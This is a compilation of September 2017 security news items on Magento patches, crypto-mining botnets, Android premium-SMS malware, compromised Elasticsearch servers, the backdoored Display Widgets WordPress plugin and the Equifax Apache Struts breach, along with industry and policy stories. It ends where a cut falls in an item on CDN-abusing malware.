15.9.2017 securityweek Vulnerebility
Magento this week released updates for Magento Commerce and Open Source 2.1.9 and 2.0.16 to address numerous vulnerabilities, including a remote code execution bug rated Critical severity.

Featuring a CVSSv3 score of 8.2, the remote code execution flaw impacts content management system (CMS) and layouts. The vulnerability allows an administrator with limited privileges to introduce malicious code when creating a new CMS page, which would potentially result in arbitrary remote code execution.

The bug affects Magento Open Source prior to 1.9.3.6, Magento Commerce prior to 1.14.3.6, Magento 2.0 prior to 2.0.16, and Magento 2.1 prior to 2.1.9 and has been addressed in Magento Open Source 1.9.3.6, Magento Commerce 1.14.3.6, SUPEE-10266, Magento 2.0.16, and Magento 2.1.9, the company notes in an advisory.

The new patches also address three High severity vulnerabilities affecting Magento 2.0 prior to 2.0.16 and Magento 2.1 prior to 2.1.9. These bugs are an information leak in the theme creation function, and arbitrary delete issue, and a remote code execution caused by arbitrary file delete and lack of input sanitization in the Magento functional tests.

The update also resolves a total of 28 Medium risk vulnerabilities, including abuse of functionality, information leak, Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS, stored), unvalidated redirection, remote code execution, insufficient session expiration, Denial of Service (DoS), and Insecure Direct Object Reference (IDOR).

Some of the flaws could be exploited by an attacker to obtain order information, exploit other vulnerabilities, redirect users to an external site, launch Man-in-the-middle attacks, retrieve information about past orders, or re-use cookies.

Other bugs, however, can be exploited by local admins to arbitrarily overwrite sensitive files; create URLs for CSRF attacks; inject code or executable scripts; inject code for an XSS attack; add files containing injected code; or modify page counter to prevent the creation of new pages.

Magento also addressed two Low risk vulnerabilities, namely a bug in account lockout mechanism, which leaks a Magento site's contact e-mail, and an IDOR that allows a logged-in user to modify order fields that they do not have permission to view.


Mocana Integrates Embedded Security Software With Industrial Cloud Platforms

15.9.2017 securityweek Security
Mocana Integrates Embedded Security Software with AWS IoT, Microsoft Azure IoT, and VMware Liota to Protect Devices

Two constants in current cybersecurity are the growing threat from insecure IoT botnets (Mirai, WireX, etcetera), and the continuing security provided by strong encryption. It is part of the mission of one venture capital funded firm to solve the former by use of the latter.

Mocana was formed in 2002 as an embedded security software company for military applications. With the help of venture capital ($11 million in May 2017 brought the total to $93.6 million), it has expanded into ICS and both the industrial internet of things (IIoT) and consumer IoT.

Mocana Logo

"We're a crypto company," Mocano's CTO Dean Weber told SecurityWeek. "While traditional security has been to provide barriers and layers of network controls -- even for IoT devices -- we offer a different approach. We use cryptography to build a trust platform for IoT, mobile and industrial devices."

The trust platform is provided as source code to device developers, who compile it into different target devices. "We're building in trustworthiness from the ground up," explains Weber. At a simple level, it can be viewed as a replacement for the widely used and hugely abused OpenSSL. Mocana comes in at about one-sixth the size of OpenSSL, and says Weber, "is an order of magnitude faster." It has, since 2002, never had a Common Vulnerabilities and Exposures (CVE) vulnerability cataloged, while OpenSSL has received around 250.

"OpenSSL provides a cryptographic library that gets calls from applications to provide services as necessary. We replace that," explains Weber, "but we do a lot more than OSSL because we start from a root of trust on the platform, and we build an X509 trust chain. The device ends up with a trust value. That trust value represents the cryptographic trustworthiness of the platform. We're building the foundation on a device, which could be an edge device, a sensor, an activator, a switch, a gravitometer, or a flow meter, or accelerometer or whatever."

In effect, a cryptographically trusted edge or IIoT device can communicate securely with its device controller. "Traditionally, that device is going to talk to a gateway service, which may be a PLC or RTU, which would then be connected to a back-end service," says Weber, who is set to speak at SecurityWeek's upcoming ICS Cyber Security Conference. "In the industrial space that would be the ICS SCADA; in the IoT space that might be a cloud service where you bring everything together for analytics or management, or both. At each one of those layers we can provide a trust platform that guarantees through the strength of the cryptography chosen (and we support many different types of crypto) that this communication/device is secure because the crypto is intact."

In the world of consumer IoT devices, any successful infection of the device with a bot will break the chain of trust and outbound traffic can be blocked. In ICS, the integrity of both the IIoT device and its communication with the SCADA device can be guaranteed. In the commercial world, Mocana this week announced that it has verified the integration of its IoT Security Platform with the IoT cloud platforms of Amazon Web Services, Microsoft Azure IoT, and VMware.

"Digital transformation is driving the adoption of IoT technologies that can measure the performance and status of billions of connected devices, says Vikrant Ghandhi, industry director, digital transformation at Frost & Sullivan. "Mocana's IoT Security Platform ensures that IoT devices can be trusted and communicate securely to the public and industrial cloud platforms. Their verification of the interoperability and integration of their cloud to AWS, Microsoft Azure IoT, VMWare-based clouds, and GE Predix is a significant benefit for companies working with Mocana."

Mocana works in the greenfield space -- it helps developers produce new secure devices. This is problematic for many devices already in the field -- especially in the ICS world where IT teams do not like to disturb production devices. Nevertheless, explains Weber, "Customers can get an upgrade if the existing device has either an OpenSSL cryptographic library in place, or sufficient processing power to accommodate Mocana's one. In some of the older brownfield sites there may not be the computer power to run a cryptographic stack. In that case there's not a lot we can do for them other than start to apply our security in the next hop up in the industrial or commercial network. We can develop unique identities for each one of those devices -- at least most of the devices can handle a certificate as a function of identity -- not all, but most."

Mocana makes it as easy as possible for developers to replace OpenSSL in existing devices. It has mapped OpenSSL APIs onto its own cryptographic library, so that the OpenSSL library can simply be replaced by the Mocana library. The device will continue to function without further changes, but using Mocana's secure software without running the risks associated with OpenSSL's known vulnerabilities.

Mocana describes its IoT platform as providing 'military grade' protection. This is a term often used without any justification by companies claiming to provide strong security. In Mocana's case, it is perfectly accurate. Mocana technology is already used inside fighter jets, helicopters, commercial aircraft, oil refineries, water systems, electric smart grids, smart buildings and smart cities.


Trump Blocks Chinese Acquisition of U.S. Semiconductor Firm

15.9.2017 securityweek BigBrothers
President Donald Trump on Wednesday blocked attempts by a Chinese state-owned firm to acquire an American semiconductor manufacturer on national security concerns, drawing a rebuke from Beijing.

The acquisition of Lattice Semiconductor Corporation, a publicly-traded Oregon company, by Chinese-owned Canyon Bridge Fund could endanger the US government's use of sensitive products the company produces, the Treasury Department said in a statement.

The Trump administration has adopted an aggressive stance towards China on trade and national security matters, launching wide-ranging investigations into the national security ramifications of Beijing's trade in aluminum and steel.

Trump has the authority to block foreign investments he deems national security threats through the Committee on Foreign Investments in the United States, an interagency committee.

In the case of Lattice, CFIUS and the president decided "the transaction poses a risk to the national security of the United States that cannot be resolved through mitigation," the Treasury said in a statement.

The decision prohibited Canyon Bridge, its partner Yitai Capital and Yitai's parent, the China Venture Capital Fund Corp (CVCF), from purchasing the US firm, which serves the consumer, communications and industrial markets.

The Treasury said the deal posed a national security risk due to Beijing's support for the transaction, the potential transfer of intellectual property to the foreign investors, and the importance of the semiconductor supply to the US government, including Lattice's products.

China's Ministry of Commerce expressed "concern" over the decision Thursday.

Spokesman Gao Feng told reporters at a regular press briefing that while each country has a right to probe investments in "sensitive fields", the power should not be used as "an instrument for implementing protectionism."

China "hopes relevant countries can treat Chinese companies' overseas acquisitions objectively and impartially, give fair treatment to such normal business practices, and create a reasonable and transparent business environment to avoid impacting investors' confidence," he said, according to a transcript of the remarks on the ministry's website.

Lattice manufactures programmable logic devices, which are semiconductors that can be programmed to provide functions similar to chips, the statement said.

Trump personally intervened in the process after the companies appealed to him directly to overrule the CFIUS ruling, according to The Wall Street Journal.

Trump's predecessor, Barack Obama, had also intervened to prevent a similar deal involving semiconductors on security concerns last year.

Chinese government-backed Grand Chip Investment scrapped plans to buy German semiconductor equipment maker Aixtron in December after Washington rejected the inclusion of Aixtron's US unit over fears it could put sensitive technology with potential military applications in Chinese hands.

"It is important to note that the US government has been particularly concerned with foreign investment, particularly Chinese investment, into the US semiconductor industry for years," said Lawrence Ward, a partner at the international law firm Dorsey & Whitney in global business focusing on US national security law.

"It is likely premature to think that the Trump administration is taking a hawkish approach to Chinese investment across all industry sectors but, of course, only time will tell," Ward said.


Miners on the Rise
15.9.2017 Kaspersky Virus
Miners are a class of malware whose popularity has grown substantially this year. The actual process of cryptocurrency mining is perfectly legal, though there are groups of people who hoodwink unwitting users into installing mining software on their computers, or exploiting software vulnerabilities to do so. This results in threat actors receiving cryptocurrency, while their victims’ computer systems experience a dramatic slowdown. Over the last month alone, we have detected several large botnets designed to profit from concealed crypto mining. We have also observed growing numbers of attempts to install miners on servers owned by organizations. When these attempts are successful, the companies’ business processes suffer because data processing speeds fall substantially.

In general, the number of users that have encountered cryptocurrency miners has increased dramatically in recent years. For example, in 2013 our products protected around 205,000 of users globally when they were targeted by this type of threat. In 2014 the number increased to 701,000, and the number of attacked users in the first eight months of 2017 reached 1.65 million.
 

Number of users Kaspersky Lab protected from malicious cryptocurrency miners from 2011 to 2017

Propagation methods

The main method for installing miners makes use of adware installers that are spread using social engineering. There are also more sophisticated propagation methods – one is exploiting vulnerabilities such as EternalBlue. In that case, the victim is a server, which is especially advantageous for the threat actors because they end up with a more powerful asset.

The following types of ads can be found in the Telegram messaging service:
 

Advert for a mining builder in a Telegram channel advertising opportunities to earn money online

By following the advertised link, the user can download a trial version of a builder which assembles a dropper for a miner with some extra features, including suspension of the software whenever the user launches a popular game.
 

The miner’s builder

To receive the full version, the user is prompted to contact the administrators of a group on the VKontakte social media site.

Main principles of operation

Concealed miners are very difficult to detect due to their specific nature and operating principles. Any user can independently install this kind of software on their computer and legally use it for mining a cryptocurrency.

Often, a crypto miner comes with extra services to maintain its presence within the system, automatic launch every time the computer is switched on, and concealed operation.

These services can, for example:

Try to turn off security software;
Track all application launches, and suspend their own activities if a program is started that monitors system activities or running processes;
Ensure a copy of the mining software is always present on the hard drive, and restore it if it is deleted.

 

We recently detected a network containing an estimated 5,000+ computers on which Minergate, a legal console miner, was installed without the users’ knowledge or consent. The software was distributed via an adware installer, and was installed as a service on the victim computer in the following way:
 

Minergate installation

The user downloads an installer from a file hosting service under the guise of a freeware program or keys to activate licensed products;
When launched, the installer downloads the miner’s dropper (exe) to the victim computer;
The dropper writes Minergate and the tool exe to the hard drive, using srvany.exe when the system boots to launch the miner as a service named windows driver.exe;
The dropper creates an additional service named exe which ensures the continuous operation of Minergate; if Minergate is deleted, the dropper restores it on the hard drive.
The dropper stores the miner configuration info in a registry record.
 

MinerGate’s configuration data

Moneymaking scheme

The two currencies most often used in concealed mining are monero (XMR) and zcash. These two ensure the anonymity of transactions, which comes in very handy for threat actors.

According to the most conservative estimates, the mining network can generate anything up to $30,000 a month to its owners.
 

The wallet of a mining botnet

The above screenshot shows a wallet coded into the miner’s configuration data. At the time of writing, a total of 2,289 XMR had been transferred from this wallet, which at the current exchange rate is equivalent to $208,299.

Assuming a regular desktop computer yields a hash rate of 30-100 H/sec, this bot may contain in the region of 4,000 computers.
 

Hash rates of the mining botnet plotted against time

Conclusion

As we see, threat actors will grasp any opportunity to make illegal money, and the methods to make money online are continuously evolving. The development of the cryptocurrency market has led to an explosive growth in cases where miners are installed without users’ knowledge or consent. This can be explained by the fact that when a new cryptocurrency is emerging, it is much easier to mine and make money from it. Threat actors are on the lookout for ways to use the resources of somebody else’s hardware, and often it is regular users who fall victim.

Kaspersky Lab’s solutions detect all the threats described in this article under the verdicts:

Win32.BitCoinMiner.hxao
PDM:Trojan.Win32.Generic
IOCs:

185b23c602e64dc6bcd2a2776095653e
33e46f76bc9bf1ff8380406f111f56af
26f42df21371bd4afe86a643ac0a6b44
25451e6fe30b54b432854bde5b9abb74


Kaspersky Chief Agrees to Testify Before Congress

15.9.2017 securityweek BigBrothers
After the U.S. Department of Homeland Security (DHS) issued a binding operational directive ordering government departments and agencies to stop using products from Russia-based Kaspersky Lab, the security firm’s CEO has been invited to testify before Congress.

Eugene Kaspersky, Kaspersky Lab’s chairman and CEO, posted on Twitter a screenshot of the invitation he received from the U.S. House of Representatives’ Oversight Subcommittee of the Committee on Science, Space, and Technology.

While the CEO has accepted the invitation to testify, the hearing has been scheduled for September 27, which might not give him enough time to obtain a U.S. visa.

Eugene Kaspersky to testify before U.S. congress

“Hope to get expedited visa,” Kaspersky said on Twitter. “As of today it takes ~2 months to get one.”

In the letter sent to Kaspersky, the government said the purpose of the hearing is to “conduct oversight of the cybersecurity posture of the federal government, and examine the extent to which the federal government utilizes your company’s products.” The hearing will also review the implementation by federal agencies of the recent Executive Order on strengthening the cybersecurity of federal networks and critical infrastructure, and the NIST cybersecurity framework.

There have been numerous media reports in the past months about Kaspersky’s alleged ties to Russian intelligence, which has raised concerns among officials, ultimately leading to the U.S. General Services Administration removing Kaspersky Lab from its list of approved vendors, and the DHS ordering government agencies to establish and implement a plan for the replacement of such products in the next 90 days.

In addition to Kaspersky Lab’s alleged ties to Russian intelligence, the DHS’s binding operational directive also references Russian laws that allegedly allow the country’s intelligence agencies to request or compel assistance from Kaspersky. However, the company pointed out that these laws only apply to ISPs and other telecoms services providers.

The announcement made by the DHS this week said Kaspersky will be given the opportunity to submit a written response to address or mitigate concerns, which the security firm welcomed.

In many cases, Kaspersky provided point-by-point responses to the allegations included in media articles regarding the company’s ties to the Russian government, but those arguments have not had any effect on the decisions and proposals made by U.S. officials. On the other hand, many members of the cybersecurity industry pointed out that no evidence has been provided to prove the antivirus company’s alleged inappropriate connections.

“I've repeatedly offered to meet with government officials, testify before the U.S. Congress, provide the company's source code for an official audit and discuss any other means to help address any questions the U.S. government has about Kaspersky Lab - whatever it takes, I will do it. And I look forward to working with any agency or government officials that are interested,” Kaspersky said in a piece published by Forbes.

“So what exactly is going on? Well, it looks to me like the reason for being shunned (despite our many offers to assist) can only be one thing: geopolitical turbulence,” Kaspersky explained. “As I've said before, it's not popular to be Russian right now in some countries, but we cannot change our roots, and frankly, having these roots do not make us guilty.”

Kaspersky Lab recently announced plans to open three new regional offices in North America next year — one in Canada and two in the U.S.


Mozilla Implements Faster Diffie-Hellman Function in Firefox

15.9.2017 securityweek Krypto
Mozilla on this week revealed plans to introduce a new key establishment algorithm in Firefox to improve both security and performance of the web browser.

Called Curve25519, and designed by Daniel Julius Bernstein, the algorithm is a high-security elliptic-curve-Diffie-Hellman function deemed suitable for a wide variety of cryptographic applications. The public key cryptography can achieve record-setting speeds, while also offering free key compression, free key validation, and state-of-the-art timing-attack protection, Bernstein explains (PDF).

Widely used for key-exchange in TLS, Curve25519 was recently standardized by the Internet Engineering Task Force (IETF). Mozilla has already implemented the algorithm in the latest Firefox Nightly, and expects Firefox 57, set to be released in November, to bring the feature to all users, Benjamin Beurdouche, Mozillian INRIA Paris - Prosecco team, reveals.

The implementation of Curve25519 into Firefox is the result of a collaboration with INRIA (French Institute for Research in Computer Science and Automation) and Project Everest (Microsoft Research, Carnegie Mellon University, INRIA).

As a result of the partnership, Mozilla aims to have the first major web browser to have formally verified cryptographic primitives.

In addition to being formally verified, the HACL Curve25519 implementation is also expected to deliver a 20% performance increase on 64-bit platforms when compared to existing NSS implementation (19500 scalar multiplications per second instead of 15100).

The enhancement, the Internet organization points out, is expected to improve the overall security of Firefox and its users, given that the key exchange algorithm has been already verified.

“Even innocuous looking bugs in cryptographic primitives can break the security properties of the overall system and threaten user security. Fortunately, recent advances in formal verification allow us to significantly improve the situation by building high assurance implementations of cryptographic algorithms,” Beurdouche says.

The organization also plans on implementing other HACL algorithms into NSS, and expects to be able to do so over the next months.


Premium SMS malware EXPENSIVEWALL infected millions of Android handsets
15.9.2017 securityaffairs Android

Google removed 50 malicious apps from the official Play Store after experts discovered a new malware, dubbed ExpensiveWall, eluded Google Bouncer checks.
Google has removed 50 malicious apps from the official Play Store after experts with security firm Check Point discovered a new malware, dubbed ExpensiveWall, eluded the checks of the Google’s Bouncer.

The ExpensiveWall malware was found in the Lovely Wallpaper app, it includes a payload that registers victims for paid online services and sends premium SMS messages from their devices. The malicious code was discovered in 50 apps on the Play Store that were downloaded by between 1 million and 4.2 million users.

“Check Point’s mobile threat research team identified a new variant of an Android malware that sends fraudulent premium SMS messages and charges users’ accounts for fake services without their knowledge.” states the analysis shared by Check Point researchers.

“The new strain of malware is dubbed “ExpensiveWall,” after one of the apps it uses to infect devices, “Lovely Wallpaper.” “

expensivewall malware

The malware is not totally new to security experts, malware researchers with McAfee first spotted it in the Play Store in January, but they highlighted that the payloads have significant differences.

The ExpensiveWall authors encrypted and compressed the malicious code in order to by bypass Google’s automated checking processes, and they succeeded!

Once the application is installed by the victims, it requests the permission to access the internet and send and receive SMS messages. Then ExpensiveWall sends back to the C&C server handset information, including its location, MAC and IP addresses, IMSI, and IMEI numbers.

The C&C server, in turn, sends the malware a URL that it opens in an embedded WebView window and downloads the JavaScript code used to send the premium SMS messages.

According to Check Point researchers, the malicious code is spread to different applications as a software development kit called GTK.

“After analyzing different samples of the malware, Check Point mobile threat researchers believe ExpensiveWall is spread to different apps as an SDK called “gtk,” which developers embed in their own apps. Three versions of apps containing the malicious code exist. The first is the unpacked version, which was discovered earlier this year. The second is the packed version, which is being discussed here, and the third contains the code but does not actively use it.” continues the analysis.

Check Point reported the discovery to Google on August 7, 2017, and the company promptly removed the malicious apps from Google Play Store. Unfortunately even after the affected Apps were removed from the store, within days another sample was spotted in the Google Play, this time it has likely infected more than 5,000 devices before it was removed four days later.”

Experts said Google missed warnings about the malware infection that were published by the users that downloaded the apps in the comments section. One of the infected apps received a huge number of negative feedback by outraged users that noticed the malicious behavior.

Unfortunately such kind of incidents is becoming frequent, in June two times in a month Google removed malicious apps infected with the Ztorg Trojans that allowed attackers to root targeted devices.

In April, Millions of users looking to get software updates downloaded an app hiding a spyware called SMSVova through the official Google Play store.

It has been estimated that the fake application hiding the SMSVova spyware was uploaded in the Google Play in 2014, and has been downloaded between 1,000,000 and 5,000,000 times.

Clearly, Google must improve its checks to avoid further incidents.


Thousands of Elasticsearch installs compromised to host PoS Malware
15.9.2017 securityaffairs Virus

Experts discovered 4,000 compromised installations on Amazon AWS of open source analytics and search tool Elasticsearch that were running PoS malware.
Security researchers from the firm Kromtech have discovered 4,000 compromised instances of open source analytics and search tool Elasticsearch that were running PoS malware.

According to Kromtech, this is just a portion of the overall number of compromised servers. Expert Bob Diachenko from Kromtech reported those servers are just 27 per cent of a total of 15,000 unsecured Elasticsearch installations discovered by the firm, and 99 per cent of the infected servers are hosted on Amazon AWS.

pos malware Elasticsearch

Amazon Web Services provides customers with a free T2 micro (EC2 / Elastic Compute Cloud) instance with up to 10 Gb of disk space, but clearly, customers are not able to properly secure the installs.

AWS offer only includes Elastisearch versions 1.5.2 or 2.3.2, and unfortunately, users skip all security configuration during the quick installation process. Due to the poor settings are chosen by the operators, the malware is running with full administrative privilege on the compromised systems

“The Amazon hosting platform gives users the possibility to configure the ElasticSearch cluster just in few clicks, but usually, people skip all security configuration during the quick installation process. This is where a simple mistake can have big repercussions and in this case it did by exposing a massive amount of sensitive data.” wrote Diachenko.

The company found command-and-control servers for Alina and JackPoS point-of-sale malware running on the compromised Elasticsearch installs.

Threat actors are managing a big POS Botnet with Command and Control (C&C) that collects credit card information stolen from payment systems.

“The lack of authentication allowed the installation of malware on the ElasticSearch servers. The public configuration allows the possibility of cyber criminals to manage the whole system with full administrative privileges. Once the malware is in place criminals could remotely access the server’s resources and even launch a code execution to steal or completely destroy any saved data the server contains.” continues Diachenko.

Below the key findings of the research conducted by Kromtech:

There are different packages of C&C malware, i.e. servers were infected multiple times

Different packages can be related to different Botnets (because POS malware was seen selling not only on Darknet but on public domains as well)

There is a lot of servers infected, for the same packages on different servers the time of infection could be different due to periodical scans and Botnets network expansion

Nearly 99% of infected servers are hosted on Amazon Web Services

52% of infected servers run Elastic Search 1.5.2 version, 47% – 2.3.2 version, and 1% for other versions.

Recent infections were made at the end of August 2017

Sysadmins must urgently check their Elasticsearch installs, analyze the connections and traffic, and check the presence of the PoS malware. In case of compromised installs, they can provide the sample to Kromtech before reinstalling the systems and apply patches as required.


Backdoored Display Widgets Plugin potentially affects 200,000 WordPress installs abusing them to spam content
15.9.2017 securityaffairs Spam

Around 200,000 WordPress websites using the Display Widgets Plugin were impacted after it was updated to include malicious code.
According to security firm Wordfence, roughly 200,000 WordPress websites were impacted after a plugin they were using was updated to include a backdoor.

“If you have a plugin called “Display Widgets” on your WordPress website, remove it immediately. The last three releases of the plugin have contained code that allows the author to publish any content on your site. It is a backdoor.” reported Wordfence.

“The authors of this plugin have been using the backdoor to publish spam content to sites running their plugin. During the past three months the plugin has been removed and readmitted to the WordPress.org plugin repository a total of four times. The plugin is used by approximately 200,000 WordPress websites, according to WordPress repository.”

display widgets plugin-repo-page

The plugin is Display Widgets, the author sold it to a third-party developer on May 19, 2017, for $15,000.

A month after the sale, the plugin was updated by its new owner for the first time showing strange behavior. The plugin had been updated several times since September when it was already removed from the plugin repository multiple times.

The Display Widgets plugin version 2.6.0, released on June 21 was removed from the repository just two days later after experts noticed it was downloading 38 megabytes of code (a Maxmind IP geolocation database) from an external server.

A few days later, on June 30, it was released the version 2.6.1 that was discovered containing a malicious file called geolocation.php and allowed to post new content to websites running the plugin. The code in the page also allowed the author to update and remove content without giving any indication to the site admins.Display Widgets was removed from the WordPress repository on July 1.

Finally, the Display Widgets plugin was removed from the WordPress repository on July 1, anyway, the author continued to issue further releases.

The Version 2.6.2 of Display Widgets was released a week later, the malicious code included was updated, but the plugin was then removed from the plugin repository on July 24. The plugin owner published version 2.6.3 on September 2, also in this case the malicious code was updated to fix a bug. Display Widgets was removed from the WordPress plugin repository on September 8.

Plugin owners speculated that the malicious code was a vulnerability that could be exploited in combination with other plugins to display spam content to users.

According to the experts, WordPress installs using version 2.6.1 to version 2.6.3 of Display Widgets are possibly impacted by the malicious code and might be displaying spam content.

Wordfence highlighted that the new plugin owners may have intentionally acted to compromise the websites using the plugin, because they included a fix for the back door in the latest release, meaning they were aware of its flaw and were exploiting it for malicious purposes.

Further investigation allowed the experts to discover that the man behind plugin spam was the Briton Mason Soiza (23) who bought the plugin in late May. The original author, who goes online with the moniker Strategy11, confirmed that Soiza approached his development team claiming his firm is trying to “build one of the largest WordPress plugin companies” and that they were already distributing over 34 plugins.

One of these plugins dubbed 404 to 301 was found delivering spam for a website owned by Soiza last year. The server used to serve spam to the plugin hosts a website owned. by Soiza. While Soiza claims to have purchased the Display Widgets plugin only earlier this year, experts with Wordfence believe it could be involved in suspicious activities. Wordfence discovered that he used also the Kevin Danna alias and that he has interests in online business such as payday loans, gambling, and escort services, among others.

“He has interests in a wide range of online business that include payday loans, gambling and ‘escort’ services, among others.” reported Wordfence.

Soiza claims to have sold Display Widgets for profit shortly after buying it and denied being involved in any illegal activity.


Které typy zabezpečení jsou v kurzu a jaké naopak nikoliv?

15.9.2017 SecurityWorld Zabezpečení
S mírou využívání cloudových služeb roste i zájem o zabezpečení dat, aplikací a aktivit v cloudovém prostředí. Gartner proto sestavil hype křivku cloudové bezpečnosti, s jejíž pomocí mohou bezpečnostní experti lépe porozumět, které z technologií jsou již zralé pro běžné nasazení a kterým bude ještě několik let trvat, než budou dostatečně vyspělé pro použití ve většině organizací.

„Bezpečnost je i nadále jedním z nejčastěji uváděných důvodů, proč se organizace vyhýbají využívání veřejného cloudu. Přesto ty společnosti, které veřejný cloud používají, paradoxně považují bezpečnost za jeden z hlavních přínosů,“ říká Jay Heiser, viceprezident výzkumu ve společnosti Gartner.

Zároveň ale upozorňuje, že na bezpečnost cloudových služeb lze pohlížet z několika úhlů pohledu. Dvěma hlavními jsou odolnost služeb samotných (například proti útokům) a schopnost uživatelů používat je bezpečně.

Hype křivka přitom podle Heisera může organizacím pomoci zorientovat se v technologiích určených právě pro řízené a efektivní používání služeb veřejného cloudu v souladu s interními i legislativními předpisy.

Na samotném počátku křivky – tedy ještě před „hype“ fází přehnaných očekávání – se nacházejí technologie zabezpečení kontejnerů nebo zálohování do cloudu a nepřerušitelná infrastruktura pro oblast bezpečnosti (immutable infrastructure), tedy nahrazení aplikací novými běžícími instancemi namísto odstavení a následného spuštění.

Na vrcholu hype křivky se momentálně nacházejí například SDP (softwarově definovaný perimetr), KMaaS (správa klíčů jako služba), nebo mobilní DLP (prevence či ochrana před ztrátou dat na mobilních zařízeních.)

Naopak poblíž nejnižšího bodu „propadu do deziluze“ je například privátní cloud, jenž by ale měl „vyspět“ do fáze produktivity během méně než dvou let, a CSB (brokerství cloudových služeb), kterému cesta k „dospělosti“ potrvá 2–5 let.

Těsně před fází produktivity jsou například zálohování a obnova virtuálních strojů nebo DR jako služba (DRaaS), fáze produktivity pak dosáhly například tokenizace, aplikační bezpečnost jako služba, vysoce dostupné a zabezpečené hypervizory nebo služby pro správu identit a profilů.


U.S. Watchdog Confirms Probe of Huge Equifax Data Breach

14.9.2017 securityweek Incindent
A U.S. consumer protection watchdog agency said Thursday it has begun an investigation into a massive data breach at credit bureau Equifax that may have leaked sensitive information on 143 million people.

The Federal Trade Commission joins US congressional committees promising to probe the causes and implications of what could be the worst breach of personal information in the United States.

"The FTC typically does not comment on ongoing investigations," said Peter Kaplan, the agency's acting director of public affairs.

"However, in light of the intense public interest and the potential impact of this matter, I can confirm that FTC staff is investigating the Equifax data breach."

The hack disclosed last week at Equifax, one of the three major credit bureaus which collect consumer financial data, potentially affects more than half the adult population.

While not the largest breach -- Yahoo attacks leaked data on as many as one billion accounts -- the Equifax incident could be the most damaging because of the nature of data collected: bank and social security numbers and personal information of value to hackers and others.

US lawmakers have expressed concern over the implications of the hack and have called for hearings.

The House Energy and Commerce Committee announced it would hold an October 3 hearing with Equifax chief executive Richard Smith.

"We know members on both sides of the aisle appreciate Mr Smith's willingness to come before the committee and explain how our constituents might be impacted and what steps are being taken to rectify this situation," said a statement from Senators Greg Walden and Bob Latta.

Smith earlier this week offered an expanded apology to consumers in a column in USA Today.

"Consumers and media have raised legitimate concerns about the services we offered and the operations of our call center and website. We accept the criticism and are working to address a range of issues," Smith wrote.

"We are devoting extraordinary resources to make sure this kind of incident doesn't happen again."

Equifax said in a "progress report" on its website that criminals exploited a vulnerability in a website application called Apache Struts.

Security researcher Kevin Beaumont said in a blog post that he warned of the vulnerability in March and urged companies to fix it. "I kept reissuing warnings," Beaumont said in a blog this week. "And then I gave up. Many Fortune 500 companies are still running these systems."


Equifax Confirms Apache Struts Flaw Used in Hack

14.9.2017 securityweek Vulnerebility
U.S. credit reporting agency Equifax confirmed on Wednesday that an Apache Struts vulnerability exploited in the wild since March was used to breach its systems.

Equifax informed customers last week that hackers had access to its systems between mid-May and late July. The breach, which affects roughly 143 million U.S. consumers, involved names, social security numbers, dates of birth, addresses and, in some cases, driver’s license numbers.

The credit card numbers of roughly 209,000 consumers in the United States and dispute documents belonging to 182,000 people may have also been stolen by the attackers. Individuals in the U.K. and Canada are also affected and a class action was already initiated by Canadian consumers.

Equifax initially only revealed that the cybercriminals exploited a vulnerability in a “U.S. website application” to access files. However, financial services firm Baird later claimed to have learned that the application in question was Apache Struts, a framework used by many top organizations to create web apps.

While some believed that the Apache Struts vulnerability was the recently patched CVE-2017-9805, which has been increasingly exploited in the wild to deliver malware, a more likely candidate was CVE-2017-5638, a vulnerability disclosed and fixed in March, and leveraged by cybercriminals shortly after.

An update posted by Equifax on Wednesday to the website dedicated by the company to the cybersecurity incident confirms that CVE-2017-5638 was the Apache Struts 2 flaw exploited by attackers.

“We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement,” the company said.

This shows that the breach was possible due to the company’s failure to patch a critical vulnerability in more than two months after its disclosure. Following the incident, others started highlighting holes in Equifax’s cyber security, including unpatched cross-site scripting (XSS) vulnerabilities reported to the company more than one year ago, and the lack of many basic protections.

Security blogger Brian Krebs reported on Tuesday that an Equifax Argentina employee portal exposed 14,000 records, including employee credentials and consumer complaints.

After New York Attorney General Eric T. Schneiderman announced the launch of a formal investigation into the Equifax breach, Illinois and nearly 40 other states joined the probe.

Equifax shares have fallen more than 30% since the disclosure of the breach, wiping roughly $5.3 billion off the company’s market capitalization.


Backdoored Plugin Impacts 200,000 WordPress Sites

14.9.2017 securityweek Vulnerebility
Around 200,000 WordPress websites were impacted after a plugin they were using was updated to include malicious code, Wordfence reports.

Dubbed Display Widgets, the plugin was sold by its original author to a third-party developer on May 19, 2017, for $15,000. Roughly one month after that, the plugin was updated by its new owner and started displaying malicious behavior. By early September, the plugin had gone through several updates and had been already removed from the plugin repository multiple times.

The first malicious Display Widgets iteration was version 2.6.0, released on June 21 and removed from the repository two days later. It was downloading 38 megabytes of code (a large Maxmind IP geolocation database) from an external server.

On June 30, version 2.6.1 was released, containing a malicious file called geolocation.php and designed to post new content to websites running the plugin. The code also allowed the plugin author to update content and remove content and prevented logged-in users (such as site owners) from seeing the content. Display Widgets was removed from the WordPress repository on July 1.

Version 2.6.2 of Display Widgets was released a week later with modified malicious code and was removed from the plugin repository on July 24. The plugin owner published version 2.6.3 on September 2 and even included a bug fix in the malicious code. Display Widgets was removed from the WordPress plugin repository on September 8.

Before the plugin was removed the fourth time, the plugin owners suggested that the malicious code was a vulnerability that could be exploited in combination with other plugins to display spam content to users. According to Wordfence, the code was in fact a backdoor providing the authors with access to publish content on websites using the plugin.

All sites using version 2.6.1 to version 2.6.3 of Display Widgets are possibly impacted by the malicious code and might be spamming their users with unwanted content. And while the new plugin owners may say they were unaware of the malicious behavior, Wordfence claims otherwise, pointing out that they included a fix for the malicious code in the latest release, meaning they were aware of its functionality.

The person who bought the plugin in late May is Mason Soiza, 23, of the U.K., the researchers have discovered. The former authors at Strategy11 revealed that Soiza approached them claiming his firm is trying to “build one of the largest WordPress plugin companies” and that they were already managing over 34 plugins.

One of these plugins appears to be 404 to 301, which was found to deliver spam last year. The spammed content was for a website owned by Soiza, while the server used to serve spam to the plugin serves another website he owned. However, Soiza apparently claims to have purchased this plugin only earlier this year.

Wordfence also discovered that he would sometimes use the Kevin Danna alias and that he has interests in online business such as payday loans, gambling, and escort services, among others. Contacted by the researchers, Soiza claims to have sold Display Widgets for profit shortly after buying it.


New Attack Abuses CDNs to Spread Malware

14.9.2017 securityweek Virus
Content delivery networks (CDNs) are being increasingly abused to spread malware, courtesy of standards that allow the download and execution of payloads on computers, ESET warns.

